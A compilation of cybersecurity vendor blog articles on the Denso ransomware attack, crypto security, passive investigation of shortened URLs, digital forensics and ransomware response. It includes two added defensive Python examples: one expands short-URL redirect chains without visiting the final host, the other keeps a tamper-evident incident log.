This attack was purportedly carried out by the Pandora group, which we believe might be a reincarnation of the Rook ransomware group, which listed Denso as a potential victim in 2021. Such a warning could have been caught with threat intelligence that monitors and alerts whenever your domain is mentioned on the deep and dark web. The criminal gang is now threatening to release 1.4 terabytes of critical information, including purchase orders, customer and corporate communications, and intellectual property such as designs and drawings. This comes just weeks after an attack on Kojima Industries, another tier-one supplier to Toyota.

During the five days that Kojima's purchase ordering system was out, Toyota had to close down 14 of its local production facilities. The attack also impacted the supply chain and operations of two other manufacturers. Although we cannot confirm at this point whether this is part of a coordinated campaign against the Toyota group, Blackpanda would encourage all manufacturers and suppliers in the region and across the automotive supply chain to continue monitoring their systems and remain vigilant.

This attack should serve as a reminder that critical data needs to be backed up and kept offline. In the event of a ransomware attack, you need to ensure that you have tested your backups for integrity, and that you can restore systems to operational efficiency. 

We also encourage companies to seek out compromise assessment services, as these can help them assess whether their existing systems have been compromised. Additionally, we highly recommend that every business checks with their operating partners that the correct access controls and permissions are in place across these organisations. 

If you believe that your organisation may be experiencing a cyber breach, contact Blackpanda immediately for prompt incident response.

The Basics

How secure are cryptocurrencies?

An overview of frequently asked questions about cryptocurrency cyber security.

Many of us in cyber security recall those early days spent musing or mining Bitcoins on deprecated servers as a way to save them from a lonely existence on a rack in the data center. It started as another form of tinkering, an experiment. But when I first heard of friends investing large sums into an actual marketplace of the stuff my reaction was as unintelligible as the ciphertext itself.  

As with any technology that reaches critical mass, Blackpanda aims to address the security considerations top to bottom.

We believe that with great exposure comes great responsibility.

This series will introduce concepts related to security, privacy, and exploitability of blockchain technologies known as crypto.

What Is Crypto?

Crypto(graphy), as it applies to cyber security, has traditionally meant the concealment of data from prying eyes. In the modern dialect, “crypto” refers to a digital asset created and maintained by a distributed network of nodes. Each such technology applies cryptography, chiefly digital signatures and hash functions, to authenticate transactions and make them non-repudiable; that verifiable, unforgeable ledger is what gives each unit its value.

Figure: Overall cryptocurrency market capitalization per week from July 2010 to January 2022 (Statista, 2022)

What Is Cryptocurrency in Simple Words?

Think of our current financial systems. Currency typically circulates through a country or union of countries as coins and paper bills. One source of truth, such as the US Treasury or the European Central Bank, regulates the flow and enforces standards, security, and a transparent accounting of the bills and coins. In reality, most money today exists in digital form, as bank credit.

How Did Crypto Start?

Cryptocurrency began with Bitcoin: a white paper published under a pseudonym in 2008 described a peer-to-peer electronic cash system, and the network went live in 2009.

We all know what became of this once-obscure proclamation. There are now close to 8,000 cryptocurrencies in circulation across the globe, with a total market capitalization that topped USD 3 trillion in November 2021. The pseudonymous alternative to cash appealed to criminals and ordinary consumers alike, and that combination drove mainstream adoption.

Is Crypto Considered a Security?

This is a commonly asked question and, while it may seem like a leap to go from a trendy financial innovation to foundational economic tools, it is important that we address it.

Aside from data protection, it is important to clarify another definition of security. Financial securities, like equities or bonds, are “instruments” that represent monetary value and facilitate exchange. You can trade securities just like you can trade a dollar for four quarters to make change for the parking meter (another analog technology replaced by digital payments, by the way). While you might think of cryptocurrencies as securities, since they are traded on consumer platforms much like equities or foreign currency, the SEC has yet to classify or regulate Bitcoin or Ethereum as such.

Certainly a topical tangent worthy of additional reading, but it boils down to crypto’s value to investors and whether or not there is an expectation of profit.  

Financial institutions and formal boundaries exist for traditional securities. Many conflate the definition of a traditional security with the mathematically verifiable asset that is a unit of cryptocurrency. Both have financial importance to individuals. Yet given how lightly these assets are monitored relative to their worth, Blackpanda continues to track the threat actors targeting both developers and individuals as part of our mandate to assist those affected in the event of an attack.

Why Is Cyber Security an Important Consideration for Crypto Currencies?

The same way we expect a degree of reliability from traditional financial systems, we need the technology companies that run cryptocurrency platforms to win our trust as well. Though they take a completely different position on where or how that regulation happens, both crypto and traditional systems aim to prevent fraud, counterfeit, and theft.

Crypto systems opt for decentralized control. Each technology designs its own transparent method of authentication and verification at each stage of the blockchain, meaning that for every operation performed on the ledger there is proof of the computation, attributed to the party performing it and visible to all. This establishes security through the many-eyes principle: the more visible something is, the more likely someone is to find its flaws. Collectively, this principle can improve the accuracy and quality of anything from data to open source software.

— —

In this series, we will focus on security as a theme across blockchain technology and its many applications. We will address attack vectors and predictions that will challenge the technology firms and exchanges powering crypto. We will also take the perspective of what security looks like to you, the crypto investor or consumer.

The Basics

Investigating a shortened URL

When you click on a shortened URL, do you really know what lies on the other side? How can you be certain that destination is friendly, and not laden with malicious intent?

Shortened URLs are great for taking long, alpha-numeric character-heavy links and converting them into short and concise alternatives – perfect for reducing character count on things like social media or minimizing eye soreness in emails and other messages.

But when you click one of these shortened URLs, do you really know what lies on the other side? And how can you be certain that destination is friendly, and not laden with malicious intent?

In this article, we will cover common misuses of shortened URLs and some practical tips for investigating them.

Purposes for short URLs

Many programs use URLs to carry session information (such as where the link is being used or where the user is coming from). The result of including all this “extra” information is often a URL that runs to hundreds of characters. For this reason, short URLs have become a convenient way for providers to publish content.

In addition to being convenient, URL shortening services can also provide useful statistics on the number of clicks a link receives, when, and from where.

If you are active on Twitter or LinkedIn, then you may already be using URL shortening without realizing it. Twitter shortens its own links automatically using the t.co domain, while LinkedIn shortens links used on the platform to avoid unsightly long links taking up the space of meaningful text. You may also notice that when you share a YouTube video, the provided share link uses the youtu.be domain, another example of automatic shortening.

Misuse of short URLs

A common technique used in phishing campaigns is obfuscating a malicious link, tricking the user into clicking what would otherwise be an easy-to-spot phishing attempt. One of the methods used to disguise these links is through a URL shortening service.

A URL shortening service takes a long link provided by a user and creates a shortened version, and a mapping between the two is maintained in an internal database. An example of a shortened URL is https://bit.ly/3eQsUNw, which when accessed redirects the user to the long URL https://www.blackpanda.com/post/17-july-2020-asia-cyber-summary

The user is then able to access the long URL by visiting the short URL, making the link much easier to share across various mediums.

Passive intelligence collection from link providers

There are many popular URL shortening services available, and each offers their own way to investigate the original long link being shortened.

First is Bitly. By adding a + symbol to the end of the shortened URL we can view Bitly's information page for the link, including its destination, without visiting that destination. Another is TinyURL. We do not get much information from this provider, but if you go to preview.tinyurl.com/[ID], you can identify the long link without navigating to the page.

Another service, Tiny.cc, only provides shortened URLs for whitelisted domains. If you add the tilde symbol (~) at the end of the link you can see the number of clicks over time. However, we cannot confirm that ‘clicks over time’ are accurate or updated regularly.

Bit.do provides a wealth of information: just add a ‘-’ (hyphen) to the end of the URL to view its statistics page.

Lastly, the provider is.gd also requires users add a ‘-’ to the end of the link in order to view the long link without navigating to it.
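The provider-specific look-ups above, as an added example (illustrative code, not from the original article): preview_url() builds the preview link for the conventions the article describes, and expand_chain() reads Location headers hop by hop but only while the current host is a known shortening service, stopping at the first host that is not, so the attacker's own server is never contacted. The HTTP layer is injected so the function can be exercised offline against constructed responses; stdlib_head() shows the real, non-redirect-following request. The shortener host list is the one the article names, and the sample URLs and addresses are constructed.

```python
"""Passive short-URL expansion helpers (added example)."""
import http.client
from urllib.parse import urlsplit, urlunsplit

# Hosts the article names as shortening services; extend for your environment.
SHORTENERS = {"bit.ly", "tinyurl.com", "tiny.cc", "bit.do", "is.gd", "t.co"}


def preview_url(short_url):
    """Return the provider's preview/info URL, or None for an unknown host."""
    parts = urlsplit(short_url)
    host, path = parts.netloc.lower(), parts.path.rstrip("/")
    if host == "bit.ly":
        return urlunsplit(parts._replace(path=path + "+"))
    if host == "tinyurl.com":
        return urlunsplit(parts._replace(netloc="preview.tinyurl.com", path=path))
    if host == "tiny.cc":
        return urlunsplit(parts._replace(path=path + "~"))
    if host in ("bit.do", "is.gd"):
        return urlunsplit(parts._replace(path=path + "-"))
    return None


def stdlib_head(url, timeout=10):
    """HEAD request that does NOT follow redirects (http.client never does).

    Returns (status, lower-cased header dict). Not called by the offline demo.
    """
    parts = urlsplit(url)
    conn_cls = (http.client.HTTPSConnection if parts.scheme == "https"
                else http.client.HTTPConnection)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    conn = conn_cls(parts.netloc, timeout=timeout)
    try:
        conn.request("HEAD", path, headers={"User-Agent": "ir-triage/1.0"})
        resp = conn.getresponse()
        return resp.status, {k.lower(): v for k, v in resp.getheaders()}
    finally:
        conn.close()


def expand_chain(short_url, head=stdlib_head, max_hops=5):
    """Follow redirects only across shortener hosts; never request the final host.

    Returns (hops, final_url, ended_on_shortener). ended_on_shortener is True
    when the last shortener answered without a redirect (e.g. a click-through
    page), in which case the real destination is still unknown.
    """
    hops, current = [short_url], short_url
    for _ in range(max_hops):
        host = urlsplit(current).netloc.lower()
        if host not in SHORTENERS:
            return hops, current, False  # stop before attacker infrastructure
        status, headers = head(current)
        location = headers.get("location")
        if status not in (301, 302, 303, 307, 308) or not location:
            return hops, current, True
        hops.append(location)
        current = location
    raise RuntimeError(f"more than {max_hops} redirects; possible redirect loop")


# --- constructed offline responses: a chained shortener ending on an attacker host
FAKE_RESPONSES = {
    "https://bit.ly/3xmpl": (301, {"location": "https://is.gd/xmpl"}),
    "https://is.gd/xmpl": (302, {"location": "http://198.51.100.23/login.php"}),
}


def fake_head(url):
    """Stand-in for stdlib_head() so the demo runs without network access."""
    return FAKE_RESPONSES[url]


def demo():
    return expand_chain("https://bit.ly/3xmpl", head=fake_head)


if __name__ == "__main__":
    print(preview_url("https://bit.ly/3eQsUNw"))
    print(demo())
```

Even the HEAD requests here go only to the shortening services, never to the host at the end of the chain; that host is the indicator to record and hunt for, not to visit.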

Conclusion

Utilizing the above methods provides additional intelligence about an indicator used in an attack without navigating to the attacker’s infrastructure. This is known as passive intelligence gathering and is a critical technique if you do not want to tip off the attacker. Note that a preview page reveals only the next hop: attackers sometimes chain several shorteners or redirectors, so repeat the check on each hop and stop at the first host that is not a shortening service, since that host may be attacker-controlled.

Letting an attacker know that you are investigating them can lead to destructive attacks being deployed and infrastructure burned in order to cover their tracks. When this occurs, the blue team is put at a disadvantage as they no longer have the element of surprise and now do not know where this adversary is coming from. Before using active methods ask the question: “Have I gathered enough information to detect the adversary if they change infrastructure?”

The Basics

Cyber security services explained

Understanding cyber security services available and how they can support your business.

Cyber threats are continuously developing, and with them, the cyber security industry. Cyber security providers offer a variety of products and services to support the strengthening of organizations’ cyber security posture, legal due diligence exercises, and cyber incident response, to name a few.

While you may find similar services under a variety of names, cyber security services can be boiled down to a few select categories. At Blackpanda, we like to classify them between consulting, risk management, and incident response.

To help you navigate through the complex array of cyber security services available on the market, we have compiled a simplified cyber security services list so that you may better understand your options.

Cyber security consulting services

What is cyber defense consulting?

Cyber Defense Consulting is carried out by specialist consulting firms. A team of dedicated specialists will work with your organization to identify and develop the core competencies necessary for a robust security program in your unique environment, in such a manner that aligns security and business objectives. This type of service is usually recommended for medium to large sized enterprises who need to develop a corporate cyber security strategy, whilst smaller organizations can benefit more from cyber security planning services and tabletop exercises.

What are security planning and tabletop exercises?

A cyber security plan specifies the security policies, procedures, and controls required to protect an organization against threats and risk.

A cyber security plan can also outline the specific steps to take to respond to a breach. Such a plan, covering key steps in incident response, must be put in place to guide cyber incident handling, mitigating attacks and recovery. This plan must follow the SANS Institute and NIST prescribed processes for a methodical and more organized approach.

Much like fire drills, cyber security is a business process that should be actively and regularly practiced such that it becomes second nature even during high-pressure situations. This is where tabletop exercises can come in handy by ensuring that your organization knows exactly what to do in case of a cyber attack. If your organization is interested in building a cyber security plan, companies such as Blackpanda offer cyber security planning and tabletop exercise services.

What is security training?

Cyber security training, also known as Security Awareness Training, should be a priority for organizations of all sizes. This type of service helps educate employees to understand existing and emerging cyber security concerns.

Cyber security training encourages employees to understand cyber security issues, identify security risks such as phishing and ransomware, practice good cyber hygiene, and learn the importance of cyber security at an organizational level.

React & Respond

What is digital forensics?

Understanding digital forensics and other frequently asked questions about the investigative cyber service.

Blackpanda specializes in Digital Forensics and Incident Response (DFIR), a field within cyber security that focuses on the identification, investigation, and remediation of cyber attacks.

Although both digital forensics and incident response are typically employed in conjunction when responding to a cyber breach, each discipline has a specific use case that is vital to the work we do at Blackpanda.

While incident response tackles the immediate requirements of breach response (learn more about Incident Response here), digital forensics enables Blackpanda specialists to piece through the aftermath of an attack in order to better understand how the breach happened in the first place.

To better delineate this contrast, this article provides a brief overview of what digital forensics is and answers frequently asked questions about our favorite set of investigative cyber techniques.

What is digital forensics?

Digital forensics is the process of uncovering and interpreting electronic data from digital devices. Data collected from these devices help identify and preserve evidentiary materials in an organization’s digital infrastructure, and can be very important in an investigation relating to a cyber attack.

Digital forensics practices include:

  • File System Forensics - whereby file systems within the endpoint are analyzed for signs of compromise
  • Memory Forensics - whereby the computer memory is analyzed for attack indicators that may not appear within the file system
  • Network Forensics - whereby network activity - including emailing, messaging and web browsing - is reviewed to identify an attack, understand the cyber criminal’s attack techniques and gauge the scope of the incident
  • Log Analysis - whereby activity records or logs are reviewed and interpreted to identify suspicious activity or anomalous events

On top of this, analysis from the digital forensics team can help shape and strengthen preventative security measures, such as with compromise assessments. This can enable the organization to reduce overall risk, as well as speed future response times.

The history of digital forensics takes root in physical investigations carried out by the police and secret services, whereby digital forensics originated as a tool for data recovery and evolved into a critical capability for law enforcement as well as criminal and civil proceedings. It is one of many capabilities employed by advanced incident responders, serving as a critical tool to investigate cyber crime.


How is digital forensics different from cyber security?

As cyber security continues to grow in awareness and understanding among the general public, terms such as cyber security and digital forensics have often been used loosely, without a clear distinction. They are however different concepts, with digital forensics being only one part of the activities practiced in the world of cyber security. In particular, digital forensics focuses on the reactive component of cyber security, supporting the incident response process in reconstructing the chain of events that led to a breach, understanding the source of the attack, and recovering compromised data. On the other hand, preventive and detective cyber security activities and tools include Endpoint Detection and Response (EDR), Vulnerability Assessments & Penetration Testing, and Compromise Assessments, to name a few.

How is digital forensics used in incident response?

By using their proficiency in computer networking and applying a thorough understanding of the factors that lead to compromised systems, cyber security incident responders can provide invaluable support in times of crisis. Acting as watchdogs and first responders against cyber crimes, these specialists apply digital forensics standards to collect, process, preserve, and analyze the digital evidence of a compromised system, looking for footprints and signatures left behind by cyber criminals.

While each case presents its own set of challenges, incident responders are able to identify, compile, and interpret large volumes of electronic data, largely through digital forensic techniques.

Additionally, the use of digital forensics assists in the recovery of lost or stolen data as part of cyber incident response efforts following a breach.

Upon being tasked to conduct incident response procedures on an endpoint or network, a digital forensics specialist will start by conducting data and security breach investigations. They will then attempt to recover and examine data from computers and electronic storage devices, as well as dismantle and rebuild damaged systems to retrieve lost data. As a last step, specialists will work to identify additional systems compromised by cyberattacks and finally begin the compilation of evidence for relevant legal cases. The end goal for a digital forensics investigator is to recover as much lost data as possible, identify the perpetrator of a cyber crime, and obtain hard evidence against them so that it can be used in a court of law.

Digital forensic practitioners are skilled in identifying and working to retrieve data that is intentionally hidden, password-protected or encrypted, while ensuring that data is not damaged or altered during the examination. Concepts such as Rules of Evidence, Chain of Custody, and Data Integrity (to name a few) are commonly used by professional digital forensic practitioners.

Is digital forensics reliable?

Digital forensics is a discipline that provides decision-makers with factual and reliable evidence of digital traces on any device under investigation. It is a collection of techniques that have been used in civil, corporate, law enforcement, and military applications globally.  

Digital forensic practitioners should be highly trained and experienced, as they must be able to attest that steps taken during the digital forensic investigation adhere to one or more regulatory frameworks and have produced the most reliable evidence given the available data, making it admissible in a court of law. Digital forensic practitioners that have their evidence examined in court are ultimately accepted as subject matter experts in certain jurisdictions.

However, investigative results and human interpretations depend on transparent access to client information as well as the proper use of specialist tools and applications designed to interpret and generate digital data. Tools may be used improperly by untrained responders, leading to faulty investigative conclusions. Where client data is limited (whether by lack of pre-breach preparation or unwillingness to disclose), investigative results may also be limited.

Improving the reliability of investigative results depends on sufficient pre-breach incident response planning, including security event monitoring and logging, as well as ensuring that your incident response team uses high-quality tools in which they are both properly trained and experienced.

How Is Digital Forensics Used in a Business Setting?

Cyber threats are no longer solely external. The rise of phishing emails, inadvertent data leaks, and malicious insider threats remains a top concern of IT leaders across the globe, accentuating the need for accurate and efficient digital forensic investigations supported by a comprehensive cyber incident response plan.

The protection of Personally Identifiable Information (PII) is another aspect of business that requires vigilance as it includes financial and legal repercussions, often requiring highly valuable digital forensic evidence in a court of law.

As more companies turn to digital forensics experts to investigate their digital infrastructure following a breach or compromise, valuable insights into a company’s digital vulnerabilities are usually identified, which can then be acted upon to secure the enterprise.


— —

We hope these answers and insights have served as a helpful start to learning more about one of the many cyber security services a company like Blackpanda can offer your business. Blackpanda offers bespoke Digital Forensics and Incident Response services to organizations in the APAC region.

Our Digital Forensics specialists draw from decades of intelligence and military experience, employing effective and battle-tested approaches when dealing with cyber incidents. In the event that your organization suffers a cyber breach, or more simply, if you would like to assess your existing defences across your network, don’t hesitate to reach out to us via the contact form below or through our email hello@blackpanda.com.

React & Respond

Everything you need to know about ransomware incident response

Here we talk about everything you should know about ransomware incident response: how it works, its history, its workings and impact, as well as some major ransomware incidents and the cyber criminal gangs that were responsible for them, and how to respond to a ransomware attack.

Ransomware is a type of malware that targets an organisation’s data. Attackers use it to hold valuable information hostage through encryption, requiring a ransom payment for it to be restored. Ransomware affects millions of businesses globally and is currently growing at unprecedented rates — both in terms of the likelihood of a ransomware attack against your organisation and of the average ransom amount requested. Ransomware is often designed to spread across a network and target database and file servers, and can thus quickly paralyse an entire organisation. 

The motivation behind ransomware attacks is primarily economic, as companies are often willing to pay millions of dollars to the attackers in order to have their files unlocked, systems restored, and business operations resumed smoothly.

With cybercriminals continuously upgrading their malware and with their strategies becoming increasingly sophisticated, attackers are developing resources to conduct cyber attacks of enormous magnitude and impact. 

Stay-at-home notices introduced during the COVID-19 pandemic have contributed to increased organisational cyber vulnerabilities with employees using personal devices connected to home or shared networks which are far less secure than organisational ones. Combined with bad cyber hygiene and a lack of general awareness of cyber best practices, organisations are truly at risk of a cyber breach.

History of Ransomware

While ransomware has been making headlines for at least the past three years as a novel attack vector, the first recorded ransomware attack occurred almost thirty years ago. In 1989, a program dubbed the “AIDS Trojan” was distributed via floppy discs to unknowing attendees of a research conference. Believing the discs were research tools, the victims loaded them into their computers and watched their files become encrypted, with the attackers demanding a ransom by mail in exchange for instructions to decrypt their systems.

One of the biggest innovations that supported the explosion of ransomware was the emergence of cryptocurrencies, notably Bitcoin’s rise in 2010. This provided an easy and untraceable method for receiving payment from victims, creating the opportunity for ransomware to become a lucrative and low-risk undertaking.

With the growth of ransomware came developments in its supply chain, as cyber criminal groups began to offer Ransomware-as-a-Service packages whereby malware programs are leased to clients around the world in exchange for a portion of their profit from ransom payments.

Read about the Top 5 Ransomware Incidents in Asian History

The Largest Ransomware Attack in History

The biggest ransomware attack ever registered occurred in May 2021, when CNA Financial (“CNA”)—one of the largest insurance companies in the US—announced that it had been hit by a sophisticated and debilitating ransomware attack. 

Whilst CNA declared that it did not lose access to any sensitive client data, over 15,000 company devices were encrypted and corporate networks were disrupted, forcing CNA to temporarily shut down its services. 

CNA worked with private sector companies and US government agencies to secure its systems and contain the malware. To end the attack, CNA paid the attackers USD 40 million in Bitcoin – the largest recorded ransom payment ever – despite FBI guidelines discouraging companies from paying ransom demands, as payment strengthens attackers’ capabilities and increases the effectiveness of such attacks in the future. 

The CNA Financial attack occurred within weeks of another ransomware incident hitting oil transportation company Colonial Pipeline, which paid USD 4.4 million to the cyber criminal group DarkSide to stop the attack and release its data. These cases are not isolated, and they serve as high-visibility examples of a pervasive ransomware problem that affects organizations of all sizes across the globe.

Read about the CNA financial cyber attack.

Another ransomware gang that has been rising on the global cyber crime scene is the Eastern European group Indrik Spider, which is behind the recent DoppelPaymer attacks that affected community colleges, police and emergency services in the US, a German hospital, and Kia Motors, amongst others.

The DoppelPaymer ransomware strain is a relatively new and high-risk cyber threat. An evolution of BitPaymer, it is able to encrypt entire networks within minutes of penetrating an endpoint. With large ransom demands and widespread targets, organisations in the APAC region should be on guard.

Everyone is at risk

The biggest misconception that exposes small and medium-sized enterprises to cyber attacks is the sense of “security through obscurity”. Start-Ups and SMEs tend to believe that they will never be targeted by cyber attacks because they are not important enough. This concept is no longer valid, as nowadays most hackers are looking to target the most vulnerable companies rather than the biggest ones. 

Potential targets are identified by “hunter” bots that look for digital windows and doors left open or unlocked. As a result, 43% of all cyber attacks today are against SMEs, which often lack not only structural preparedness and organisational cyber security awareness but also the financial resilience needed to survive an attack.

Preparation is the key to survival. Educating employees on cyber best practices and ensuring that all systems are appropriately patched and protected is key to building resilience against cyber attacks. Further, having a well-rehearsed incident response plan and playbook allows for immediate response, such that in the event of a breach, response becomes an act of muscle memory.

Read about how Start-Ups and SMEs should develop their cyber security preparedness in order to maintain a confident attitude in the Asian and global markets and survive in an ever-changing cyber-threat panorama.

How to Respond to Ransomware

Whilst it is impossible to fully eliminate the risk of cyber attacks, steps can be taken to significantly reduce the chances that these may happen. 

Aside from some simple steps that every organisation can take to improve their cyber security posture, it is important to have a good incident response plan to ensure that when risks occur, you know exactly what to do. At Blackpanda, we act like “cyber firefighters”, always on call and ready to roll out to compromised client systems just like firefighters do when a fire breaks out. We take this approach from our military origins, which inspire us to treat each cyber security matter in a similar light to a physical security one.

Here is a simple checklist of pre-breach, mid-breach and post-breach actions that you, in collaboration with a trusted digital forensics and incident response provider, can do to ensure that you are handling a cyber incident in the most secure and efficient way.

PRE-BREACH PREP 

  • Use an EDR Service 
  • Prepare an Incident Response Plan and Team  
  • Purchase a Cyber Insurance Policy 

ACTIVE BREACH RESPONSE 

  • Disconnect or Shut Down Computing Devices 
  • Contact a Trusted IR Team 
  • Document All Significant Events and Actions 

POST-BREACH MANAGEMENT  

  • Deploy EDR Services 
  • Regularly Patch and Update 
  • Ensure Effective Backups Exist  
  • Tighten Security Configurations 
  • Have a Plan and Team in Place for Future Breaches 
  • Ongoing Cyber Awareness Training for Employees 
  • Insure Against Future Cyber Losses

– –

Ransomware is the biggest cyber threat organisations face today. Whilst good cyber hygiene and employee awareness are a good first step to reduce your company’s exposure to ransomware, the risk remains very high and cannot be eliminated.

The best way to build ransomware resilience is to have a good cyber incident response plan in place. Blackpanda’s incident response planning consultancy and tabletop exercise services help organisations develop the best cyber strategy for their particular industry and location.

To catch threats already in your networks before they can cause serious damage, carrying out frequent compromise assessments is essential, and in the event that you may already be experiencing a ransomware attack, Blackpanda is ready to intervene with tailored and APAC-focused incident response. 

IR-1: The most effective cyber risk management solution for SMEs in Asia


Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.

Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.

Get in touch with us to learn more about IR-1.

React & Respond

How to respond to ransomware

How your company can protect itself from ransomware and what to do in the event of an attack.

Ransomware attacks have been on the rise, with the Asia Pacific region alone experiencing a 168% increase in ransomware incidents in 2021 compared to the previous year (Check Point Research, 2020). Not only are ransomware attacks becoming more common, but they are targeting organizations across all sectors and sizes, from large multinationals to Small-Medium Enterprises (SMEs) and startups.

Ransomware attackers target an organization’s data, holding it hostage through encryption and requiring payment for it to be restored. Ransomware affects millions of businesses globally and is currently growing at unprecedented rates — both in terms of the likelihood of a ransomware attack against your organization and of the average ransom amount requested.

With ransom demands averaging USD 180,000, hackers are always on the lookout for digital open doors. It is crucial for organizations of all sizes to be informed of the cyber risks they face and to build resilience.

In this article, we look at how your company can protect itself from ransomware and what to do in the event that you experience an attack.

How to mitigate cyber risk

Whilst it is impossible to fully eliminate the risk of cyber attacks, steps can be taken to significantly reduce the chances that these may happen.  

For example, keeping systems up-to-date is critical for ensuring the attacker has minimal opportunity to leverage vulnerabilities in your computing environment, and deploying Endpoint Detection and Response (EDR) services puts the highly specialized responsibility of monitoring for alerts or unwanted behaviour on the network into the hands of professional analysts backed by proven systems and procedures.

Additionally, companies should train their staff on how to spot and react to phishing attempts, which often lead to ransomware attacks, as this helps stop attackers at the front door and converts staff from being passive liabilities to active defenders.

Simple steps to protect your organization from ransomware

Pre-breach security is key in minimizing the chances that your company is compromised. This can be done through simple practices such as tightened security measures, full disk encryption, a strong password policy including multi-factor authentication (MFA), and the principle of least privilege.

Tightening security measures should be done by understanding and enabling the full range of security features already available in your computing environment. This can be done through a security settings monitor such as that included in Pandarecon™, which checks that endpoints across the company are appropriately set up to carry out their necessary actions, without leaving unnecessary open doors.

Across all platforms, passwords are the first line of protection against unauthorized access to your computer. The stronger the password, the higher the level of protection your computer has from malicious software and hackers.

Alongside full disk encryption, MFA is the simplest and most effective way to confidently identify a user, protect their personal and organizational data, and prevent identity theft.

The primary benefit of MFA lies in enhancing your organization's security by requiring users to authenticate their identity with more than a username and password. While important, usernames and passwords are vulnerable to brute force attacks and can be stolen by third parties.

Additionally, companies should apply the principle of least privilege across all company platforms. This principle works by allowing only enough access to perform the required job. In an IT environment, adhering to the principle of least privilege reduces the risk of attackers gaining access to critical systems or sensitive data by compromising a low-level user account, device, or application. Implementing this principle helps contain compromises to their area of origin, stopping them from spreading to the system at large.

Finally, having a clear incident response (IR) plan, including a good cyber insurance policy which offers expert digital forensics and incident response (DFIR) services and management support in the event of a cyber attack, enables teams to react in a controlled and proven manner, saving precious time and resources following an attack.

Ransomware incident response

Step 1: Disconnect or shut down your computing devices

Should you suspect or know that you are under attack from ransomware, you can either disconnect or power down all devices on the network.

Disconnecting affected computing device(s) from the network will prevent the malware from spreading to or encrypting other devices in the network, thus limiting the potential damage, and maintaining the maximum amount of forensic data.

However, the ransomware will continue to encrypt files on infected devices. Powering down all devices stops the ransomware from encrypting further files, which can be vital for the organization’s continuation of business as usual but comes at the risk of losing forensic information. Do not switch on any further devices, as this will allow the ransomware to spread further.

It is crucial that you document everything that happens and all your actions from the moment you find out about an attack. Take extensive notes (photos and screenshots are preferable) that record:

  • Information displayed on screen
  • Key dates and times
  • Hostnames
  • Bitcoin accounts
  • Email addresses

All this information is used during the investigation to reconstruct the exact timeline of events, pinpoint the first known compromise, and track communications with the attackers.
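As an added example (not code from the original article or from Blackpanda), here is a small Python incident log that records the fields listed above, chains each note to the previous one with SHA-256 so later alteration is detectable, and derives the event timeline and first known compromise from the notes. All hostnames, addresses and timestamps in it are constructed placeholders.

```python
"""Tamper-evident incident log for ransomware response notes (added example)."""
import copy
import hashlib
import json
from dataclasses import dataclass, asdict
from datetime import datetime
from typing import Dict, List, Optional


@dataclass
class Entry:
    seq: int
    observed_at: str            # ISO 8601 timestamp (with UTC offset) of the observation
    recorded_by: str            # who wrote the note, supporting chain of custody
    hostname: str               # affected host, or "-" for out-of-band events
    category: str               # "observation", "action" or "attacker_contact"
    detail: str                 # free text, e.g. the ransom note shown on screen
    indicators: Dict[str, str]  # e-mail or wallet addresses seen in notes/messages
    prev_hash: str              # hash of the previous entry (hash chain)
    entry_hash: str = ""        # filled in by IncidentLog.add


class IncidentLog:
    """Append-only log whose entries are linked with SHA-256 hashes."""

    GENESIS = "0" * 64

    def __init__(self) -> None:
        self.entries: List[Entry] = []

    @staticmethod
    def digest(e: Entry) -> str:
        fields = asdict(e)
        fields.pop("entry_hash")  # the hash covers every field except itself
        payload = json.dumps(fields, sort_keys=True, separators=(",", ":"))
        return hashlib.sha256(payload.encode("utf-8")).hexdigest()

    def add(self, observed_at: str, recorded_by: str, hostname: str,
            category: str, detail: str,
            indicators: Optional[Dict[str, str]] = None) -> Entry:
        datetime.fromisoformat(observed_at)  # reject unparseable timestamps early
        prev = self.entries[-1].entry_hash if self.entries else self.GENESIS
        e = Entry(len(self.entries), observed_at, recorded_by, hostname,
                  category, detail, indicators or {}, prev)
        e.entry_hash = self.digest(e)
        self.entries.append(e)
        return e

    def verify(self) -> bool:
        """True only if no entry was altered, removed or reordered after the fact."""
        prev = self.GENESIS
        for i, e in enumerate(self.entries):
            if e.seq != i or e.prev_hash != prev or self.digest(e) != e.entry_hash:
                return False
            prev = e.entry_hash
        return True

    def timeline(self) -> List[Entry]:
        """Entries ordered by when they were observed, not when they were written."""
        return sorted(self.entries, key=lambda e: datetime.fromisoformat(e.observed_at))

    def first_known_compromise(self) -> Optional[Entry]:
        hits = [e for e in self.timeline() if e.category == "observation"]
        return hits[0] if hits else None

    def attacker_contacts(self) -> List[Dict[str, str]]:
        return [e.indicators for e in self.timeline() if e.category == "attacker_contact"]


def build_sample_log() -> IncidentLog:
    """Constructed sample notes; hosts, addresses and times are placeholders."""
    log = IncidentLog()
    # Notes are often written after the fact, so observed_at can arrive out of order.
    log.add("2024-03-14T09:40:00+08:00", "it-admin", "FS-01", "observation",
            "Ransom note README.txt shown on screen; shared drive files renamed")
    log.add("2024-03-14T09:52:00+08:00", "it-admin", "FS-01", "action",
            "Unplugged network cable from FS-01; left powered on to preserve forensics")
    log.add("2024-03-14T07:15:00+08:00", "helpdesk", "WS-17", "observation",
            "User reported changed wallpaper and unreadable files (helpdesk ticket)")
    log.add("2024-03-14T10:05:00+08:00", "ciso", "-", "attacker_contact",
            "Contact details copied verbatim from the ransom note",
            {"email": "contact@example.invalid", "wallet": "bc1-EXAMPLE-PLACEHOLDER"})
    return log


def tampered_copy(log: IncidentLog) -> IncidentLog:
    """Quietly rewrite an earlier note; verify() must then fail."""
    other = copy.deepcopy(log)
    other.entries[1].detail = "Rebooted FS-01"
    return other


if __name__ == "__main__":
    sample = build_sample_log()
    for e in sample.timeline():
        print(e.observed_at, e.hostname, e.category, e.detail)
    print("chain intact:", sample.verify(), "| after tampering:", tampered_copy(sample).verify())
```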

Step 2: Contact your trusted IR team

The sooner IR specialists can intervene in a live crisis situation, the higher the chances of successfully defeating the attackers and recovering hostage data. IR specialists are trained to mitigate the effects of an incident in a timely and organized manner, including analysing the intrusion, containing the impact, investigating the root cause, and remediating the issue with maximum efficiency and minimal business interruption.

